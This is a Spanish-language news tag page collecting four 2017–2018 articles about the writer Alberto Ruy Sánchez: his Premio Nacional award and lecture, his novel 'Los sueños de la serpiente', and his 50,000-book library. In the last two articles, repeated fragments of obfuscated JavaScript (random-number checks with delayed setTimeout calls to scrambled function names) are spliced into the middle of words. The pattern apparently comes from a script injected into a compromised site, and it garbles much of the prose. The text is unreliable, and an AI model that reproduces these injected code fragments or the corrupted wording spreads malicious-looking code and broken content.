Etiquetas: Alberto Ruy Sánchez


Destaca Alberto Ruy Sánchez el oficio del escritor

17 mayo, 2018

México. El oficio de escribir es anterior a las formas que vivimos ahora de productividad económica, y entre sus intenciones hay varias que son rituales y que conectan a la poesía con sus orígenes más antiguos, aseguró esta noche el escritor Alberto Ruy Sánchez.

Durante el ciclo de conferencias magistrales ‘Encuentro con los Premios Nacionales’, organizado por las secretarías de Cultura y de Educación Pública, el autor de títulos como ‘Los nombres del aire’ (1987) y ‘Los demonios de la lengua’, por mencionar algunos, señaló que escribir era obra de chamanes, ‘oficio con funciones múltiples y muy variadas maneras de ejercerse’.

En la Sala Manuel M. Ponce del Palacio de Bellas Artes, el Premio Nacional de Ciencias y Artes 2017 en la categoría Lingüística y Literatura, habló sobre el oficio del escritor, acompañado de la directora del Instituto Nacional de Bellas Artes, Lidia Camacho, quien minutos antes elogió el trabajo literario del escritor.

Ruy Sánchez comentó que cada uno de sus libros y textos, se alimentan abiertamente de las técnicas artesanales, de sus soluciones creativas, “son composiciones cerámicas, imágenes en movimiento, ámbitos que deben dar sentido a la vida”.

“En cada uno me he enfrentado a la indeterminación del juego de la palabra, del juego de la vida, en cada uno me he tenido que reinventar, porque además cada cosa que tiene la necesidad de contar, requiere una forma artística que es la suya, cada obra, una forma nueva.

“Todo ello lleva implícita, la enorme distancia con escritores, que conciben cada uno de sus libros como se piensa la producción de una película y sacan un libro cada año. En ese sentido yo no soy un escritor profesional, lo soy en cambio en el sentido de asumir los retos de mi oficio, enfrentarme a ellos de la mejor manera de la que cada vez soy capaz”, dijo.

Y es que para Ruy Sánchez, ‘cada libro es un reto de vida que cuestiona y pone al borde del abismo, todo lo que creo que puedo hacer y toda la relación de mi quehacer con el mundo’.

“Todo lo que soy y lo que creo que puedo, puede estar en cada nuevo libro; pero el proceso de hacer cada uno es para mí literalmente entrar a un laberinto distinto y buscar a tientas la salida.

“Es como entrar a un laberinto y elaborar con mis manos la salida, moldearla y hornearla, lo que implica en el proceso fracasar y cantar de nuevo. Cada libro es una aventura vital del horizonte incierto, es una meta extraña, laberíntica pero no de espaldas al mundo, sino todo lo contrario, en el laberinto de mi soledad, llevo al mundo conmigo, y en la salida del laberinto, yo mismo soy algo del barro modelado por el mundo.

El autor habló sobre el referido galardón, mismo que le fue entregado en días pasados “por su calidad y originalidad literarias en los géneros de narrativa, ensayo y poesía, así como por el carácter universal de su obra y la proyección de la cultura mexicana”.

“El Premio Nacional es el mayor reconocimiento que recibe un escritor por su trayectoria, es decir, por el conjunto de sus libros, por el significado de ellos en México, y la invitación a responder a esta distinción con una conferencia en el Palacio de Bellas Artes implica, para mí, la responsabilidad de contar una historia, algunas veces terrible, muchas veces erótica”, dijo.

Y agregó que ello implica compartir públicamente la intimidad de un oficio: sus adversidades y sus placeres, sus múltiples y muchas veces inesperadas complicidades con lectores y, sobre todo, con lectoras.

Fuente: Notimex


Sorprende Alberto Ruy Sánchez con “Los sueños de la serpiente”

14 diciembre, 2017

México. Alberto Ruy Sánchez (México, 1951), designado hace unos días radiante Premio Nacional de Artes y Ciencias 2017, en el campo de la Lingüística y Literatura, promueve su reciente obra, “Los sueños de la serpiente”, donde una especie de canto poseído retumbaba en la cabeza del protagonista, insistente y escalofriante, como el viento de invierno entre los árboles.

Para recuperar la memoria, ese hombre centenario, encerrado en un psiquiátrico, dibuja y escribe sobre los muros de su celda los recuerdos que va recuperando.

Esto lo lanza a una aventura por las ilusiones y desilusiones de su siglo, y a descubrir las múltiples vidas que lo habitan. Tiene que inventar a sus ancestros y dejar que destile la verdad más profunda. Es decir, tiene que inventarse a sí mismo.

Eso, a partir de unos cuantos jirones de recuerdos o delirios. Su misterio se va aclarando con sobresaltos, silencios y desbordamientos: aparentemente es un mexicano emigrado a Estados Unidos, convertido en trabajador automotriz; enamorado frustrado de la mujer que sería seducida utilitariamente por el asesino de León Trotsky. Emigrado de nuevo a la Unión Soviética, se vuelve obrero.

Trabaja en la planta armadora que Henry Ford le vendió a Stalin para crear una utópica Detroit soviética. Fue tutor de inglés de Sergo Beria, hijo del jefe de la Policía Secreta, de la que fue más de una vez peón y víctima.

Finalmente es el calígrafo y constructor de este peculiar laberinto. En el centenario de la Revolución Soviética, su testimonio es cámara de ecos, tan entusiastas como adoloridos.

Su catatonia y su despertar son los del siglo… y no han terminado, escribió Alberto Ruy Sánchez, autor también de otros libros como “Quinteto de Mogador”, “Luz del colibrí” y “Elogio del insomnio”. Autor de largo aliento, ha ganado los premios Xavier Villaurrutia; San Petersburgo Lee, en Rusia; de Poesía Festival de Lugano, Suiza, y el Oficial de la Orden de las Artes y de las Letras, en Francia.

Ruy Sánchez estudió Comunicación en la Universidad Iberoamericana; un posgrado en la Universidad Jussieu, en París; Filosofía, en la Universidad de Vincennes, y Literatura en la Escuela de Altos Estudios de París. Ha sido ampliamente elogiado por autores gloriosos como Octavio Paz y Juan Goytisolo.

El primero señaló en su época que “en su prosa nítida y rápida, relata historias complejas en las que la psicología individual se mezcla a la política colectiva, la literatura a la pasión por la justicia, la introspección del solitario a la sed de fraternidad, la duda a la creencia. Duelo entre la fe, que es amor a nuestros ídolos y a nuestros correligionarios, y el difícil amor a la verdad; no se limita a relatar: Examina y desentraña”.

El segundo dejó ver que aprecia en los libros de Ruy Sánchez “la búsqueda de la forma necesaria para cada historia que cuenta. Es algo excepcional en tiempos donde se cultiva lo contrario y eso hace de él un escritor extramuros. De sus relatos y ensayos hablamos con Susan Sontag, con Luce López Baralt y Severo Sarduy, y con Octavio Paz, y todos coincidimos en esa apasionada singularidad”.

Fuente: Notimex


Gana Alberto Ruy Sánchez Premio Nacional de Artes y Literatura 2017

10 diciembre, 2017

México. Por su calidad y originalidad literaria en los géneros de narrativa, ensayo y poesía, así como por el carácter universal de su obra y la proyección de la cultura mexicana a lo largo de su amplia trayectoria, el escritor mexicano Alberto Ruy Sánchez ha sido acreedor al Premio Nacional de Artes y Literatura 2017 en el campo de la Lingüística y Literatura.

Autor de 30 libros de géneros diversos, además de ser coautor, protagonista y editor, Alberto Ruy Sánchez estudió Comunicación en la Universidad Iberoamericana; un posgrado en la Universidad Jussieu, en París; Filosofía, en la Universidad de Vincennes, y Literatura en la Escuela de Altos Estudios de París.

Al dar a conocer a los ganadores del Premio Nacional 2017 en distintas disciplinas, la Secretaría de Educación Pública (SEP) destacó que se trata del máximo reconocimiento que otorga el Gobierno de la República a las personalidades mexicanas más sobresalientes por su obra en las ciencias exactas, la tecnología y la innovación.

En el campo de las Bellas Artes el galardón ha sido concedido a Nicolás Echevarría, quien ha demostrado “su gran compromiso social hacía el acontecer del México contemporáneo, y su significativa investigación de las raíces del mundo indígena y mestizo, plasmado en su extraordinaria trayectoria como realizador cinematográfico, documentalista, escritor, pintor y músico”.

Echeverría estudió Arquitectura en la Universidad de Guadalajara; y Música, en el Conservatorio Nacional de la Ciudad de México; y Composición con Mario Lavista, quien se convirtió en su colaborador, ya que ha escrito la música de casi todas sus películas. Su carrera se desarrolló inicialmente en el cine documental al que llegó por su interés en la magia, la religión y los ritos indígenas, ligados al uso de alucinógenos.

Mientras que el Premio Nacional de Historia, Ciencias Sociales y Filosofía es para María de las Mercedes Guadalupe de la Garza y Camino, por la originalidad y excelencia de sus trabajos de investigación; la apertura de un nuevo campo académico y su continuo compromiso con la formación de nuevas generaciones en el campo de las Humanidades y de las Ciencias Sociales.

De la Garza y Camino cursó las carreras en Letras Hispánicas e Historia, y en ésta última disciplina obtuvo los grados de licenciatura, maestría y doctorado. Su formación filosófica la realizó bajo la enseñanza de catedráticos como Luis Villoro, Eduardo Nicoi, y Miguel León-Portilla.

En tanto, Francisco Barnett Astorga será condecorado con el Premio Nacional de Artes y Tradiciones Populares, al destacar como líder espiritual que expresa los valores estéticos del pueblo Comcáac de manera integral y que trasciende a las nuevas generaciones.

Cabe señalar que los galardonados con el Premio Nacional de Artes y Literatura también son distinguidos con su ingreso como creadores eméritos del Sistema Nacional de Creadores de Arte.

El Premio Nacional en el campo de Ciencias Físico-Matemáticas y Naturales ha sido concedido a la investigadora María Elena Álvarez-Buylla Roces por su aportación a la comprensión de la dispersión de los transgenes de las variedades nativas del maíz, y su contribución al entendimiento de la progresión del cáncer epitelial.

En tanto, en el campo de la Tecnología Innovación y Diseño el ganador es Emilio Sacristán Rock, por contribuir al desarrollo tecnológico en el campo de la Ingeniería Biomédica, sus innovaciones, la transferencia al sector salud e impulso a la creación de grupos de investigación vinculando academia-empresa, fundamentales para el desarrollo de México.

El Consejo de Premiación del Premio Nacional de Ciencias es presidido por el secretario de Educación Pública, e integrado por los titulares de la Universidad Nacional Autónoma de México; la Universidad Autónoma Metropolitana; el Instituto Politécnico Nacional; el Consejo Nacional de Ciencia y Tecnología; la Asociación Nacional de Universidades e Instituciones de Educación Superior, y un representante de El Colegio Nacional.

Conforme a la normatividad vigente, la resolución del presidente de la República, Enrique Peña Nieto, sobre el otorgamiento de los premios, se publicará en el Diario Oficial de la Federación y los galardones serán entregados por el jefe del Ejecutivo.

Fuente: Notimex


Admite Ruy-Sánchez que no ha leído los más de 50 mil libros de su biblioteca

30 noviembre, 2017

México. Algunos calculan que en la biblioteca de Alberto Ruy-Sánchez hay cerca de 50 mil libros; sin embargo, cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando le preguntan cuántos de ellos ha leído, el autor, quien recibió un homenaje en la Feria Internacional del Libro de Guadalajara, da una respuesta sorprendente: “Ninguno”.

Incluso en los libros que ha leído, hay “mil cosas” que no recuerdo. “Por eso, mi respuesta más sincera y verdadera es que no he leído ninguno”, dijo el escritor tras recoger el reconocimiento.

“Todos mis libros están a punto de leerse siempre como la primera vez. Es el mismo gran reto de toda relación amorosa: renacer en ellas”, señaló el también editor en su discurso.

Organizados en las estanterías según criterios caóticos que solo él conoce o apilados en columnas por el suelo, los libros “están vivos, están en mí hasta cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando no están conmigo”, dijo Ruy-Sánchez.

Como anécdota, relató que después del terremoto del pasado 19 de septiembre que sacudió la capital mexicana, un amigo le dijo que, aunque se le hubieran caído libros al suelo, nadie se iba a dar cuenta. “Habrán quedado como siempre los tienes”, dijo su amigo, citado por el novelista, poeta y ensayista.

El autor de Los nombres del aire (1987) comentó que ha asistido a todas las FIL de Guadalajara, aunque al principio fue para vender las primeras suscripciones para su revista, Artes de México.

“Haber puesto el libro en la vida de varias generaciones ha transformado esta ciudad, ha mejorado sus útiles para leer la vida”, clamó sobre el evento editorial, considerado el más importante en lengua española.

Leer, aseguró, produce una diferencia en cualquier persona, de cualquier sector social. “El problema de que un gobernante no lea no es que no tenga cultura acumulada, sino que le será más difícil leer su realidad y tomar mejores decisiones”, sostuvo.

Indicó que, aunque parece que quien lee solo usa el sentido de la vista, también “toca, huele, piensa, viaja y baila”.

Entre otros reconocimientos, Ruy-Sánchez ha recibido a lo largo de su trayectoria el Premio Xavier Villaurrutia, la Orden de las Artes y las Letras del Gobierno de Francia y el Premio Juan Pablos al Mérito Editorial.

Fuente: AlMomento.Mx


Mis libros son casi obras de investigación antropológica: Alberto Ruy Sánchez

30 agosto, 2017

México. Cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o escribo no pienso en la literatura, trato de investigar de realidades del deseo, eso es lo primero, antes que nada, mis libros son casi obras de investigación casi antropológica, aseguró el escritor Alberto Ruy Sánchez.

Entrevistado previo a la presentación de los 30 años de la primera edición de “Los nombres del aire” en la Sala “Manuel M. Ponce” del Palacio de Bellas Artes, el autor agradeció a sus lectores las tres décadas de esta novela en la que como si fueran notas musicales, explora a las mujeres y sus misterios, así como los esfuerzos del hombre por entender los deseos femeninos.

“Se cumplen 30 años de la primera edición y 33 ediciones en español y una docena en otras lenguas y varias colecciones de bolsillo y eso lo han hecho los lectores y muy en especial las lectoras que, de alguna manera, me dan la impresión que compensaron los ocho años que me pase escuchandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o historias de deseos de mujeres para poder hacer esto.

“No es un libro en el que esta sólo mi invención, sino que es un libro testimonial, sobre el deseo femenino al que presente con una forma literaria mía, pero que la realidad lo sustenta, es una realidad de haber escuchado a varias mujeres por mucho tiempo y que seguía haciéndolo para realizar cinco libros del conjunto que se llama El Quinteto de Mogador y que incluye: En los labios del agua, Los jardines secretos, La mano el fuego y Nueve veces el asombro”, dijo a Notimex.

En esta novela escrita como una partitura musical, Ruy Sánchez lleva al lector a viajar a un espacio que envuelve, seduce, lleno de placeres minuciosos, al tiempo que invita a descubrir el deseo.

“El éxito se lo atribuyo a los lectores y lectoras, lo han recomendado de boca en boca y de boca a oído, y eso lo ha mantenido vivo, más la actividad de los editores mexicanos que lo han mantenido accesible a esos lectores que de pronto lo buscan y lo encuentran. Es un libro que de pronto tuvo una gran mayoría de lectoras mujeres y en las nuevas, lectores hombres”, indicó.

Contó que el texto es producto de un viaje que realizó a Marruecos, en especial, la ciudad portuaria de Essaouira, antigua Mogador, situada al norte de África en la Costa Atlántica y de la cual quedó impresionado por su cultura y cercanía con México.

“Para realizar el libro se retomaron técnicas que vienen de otras artes, no solo de la literatura, sino de la música porque el libro pretende ser sobre todo una composición, pero también de las artesanías, pues todos mis libros utilizan técnicas que provienen de las artesanías y este, sobre todo, de los textiles. Todos mis libros se inspiran de artesanías”, refirió.

Explicó que escribir esta novela no fue una decisión, sino que se trata de una vocación como escritor, como autor.

“No es una decisión de que voy a escribir, sino que la vida te empuja a querer hacer algo y querer hacerlo lo mejor posible. Lo que decidí es dedicarme a la escritura más que otras cosas, sabiendo que de eso no iba a poder vivir, pero de todas maneras iba a tratar de hacerlo lo más profesional posible. Entonces la decisión de escribir es estar pendiente de los libros que escribes”, expuso.

Así como su novela hermana, “En los labios del agua”, que interroga el deseo de los hombres; y una tercera, “Los jardines secretos de Mogador”, cuyo texto es una búsqueda de sus encuentros en fugaces paraísos.

Todas se sitúan en la ciudad imaginaria de Mogador, donde se tejen los deseos, donde los cuerpos voraces se transforman imaginariamente, donde todo nos recuerda la profunda vena arábigo-andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}aluza de nuestra cultura, como una cicatriz olvidada detrás de nuestro sexo.

La prosa de “Los nombres del aire” es un espacio envolvente, lleno de placeres minuciosos. Está muy cerca de la poesía y su estructura minuciosa es como un poema extenso: es seductora prosa de intensidades.

De acuerdo con el autor, quien esta noche estuvo acompañado de Ricardo Cayuela, director editorial de Penguin Random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}om House, y de la cantante Sasha Sokol, quien leyó un par de fragmentos de la obra, en octubre saldrá a la luz su nuevo libro “Los sueños de la serpiente”, el cual, dijo, detallará más adelante.

Fuente: Notimex